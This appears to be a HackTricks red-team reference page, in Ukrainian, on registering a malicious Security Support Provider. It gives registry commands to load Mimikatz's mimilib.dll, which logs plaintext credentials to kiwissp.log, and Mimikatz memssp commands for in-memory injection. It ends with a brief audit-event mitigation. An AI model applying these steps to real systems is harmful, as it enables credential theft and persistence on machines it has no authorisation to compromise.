Custom SSP
Tip
Вчіться та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вчіться та практикуйте Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Перегляньте повний каталог HackTricks Training для assessment tracks (ARTA/GRTA/AzRTA) і Linux Hacking Expert (LHE).
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 Discord group, telegram group, слідкуйте за @hacktricks_live на X/Twitter, або перегляньте сторінку LinkedIn і YouTube channel.
- Діліться hacking tricks, надсилаючи PRs до репозиторіїв github HackTricks і HackTricks Cloud.
Custom SSP
Дізнайтеся, що таке SSP (Security Support Provider) тут.
Ви можете створити свій власний SSP, щоб захоплювати в чистому вигляді облікові дані, які використовуються для доступу до машини.
Mimilib
Ви можете використовувати бінарний файл mimilib.dll, наданий Mimikatz. Це буде записувати в файл всі облікові дані в чистому вигляді.
Скиньте dll у C:\Windows\System32\
Отримайте список існуючих LSA Security Packages:
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
Додайте mimilib.dll до списку постачальників підтримки безпеки (Security Packages):
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
І після перезавантаження всі облікові дані можна знайти у відкритому вигляді в C:\Windows\System32\kiwissp.log
У пам’яті
Ви також можете безпосередньо впровадити це в пам’ять, використовуючи Mimikatz (зверніть увагу, що це може бути трохи нестабільно/не працювати):
privilege::debug
misc::memssp
Це не переживе перезавантаження.
Пом’якшення
ID події 4657 - Аудит створення/зміни HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
Tip
Вчіться та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вчіться та практикуйте Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Перегляньте повний каталог HackTricks Training для assessment tracks (ARTA/GRTA/AzRTA) і Linux Hacking Expert (LHE).
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 Discord group, telegram group, слідкуйте за @hacktricks_live на X/Twitter, або перегляньте сторінку LinkedIn і YouTube channel.
- Діліться hacking tricks, надсилаючи PRs до репозиторіїв github HackTricks і HackTricks Cloud.


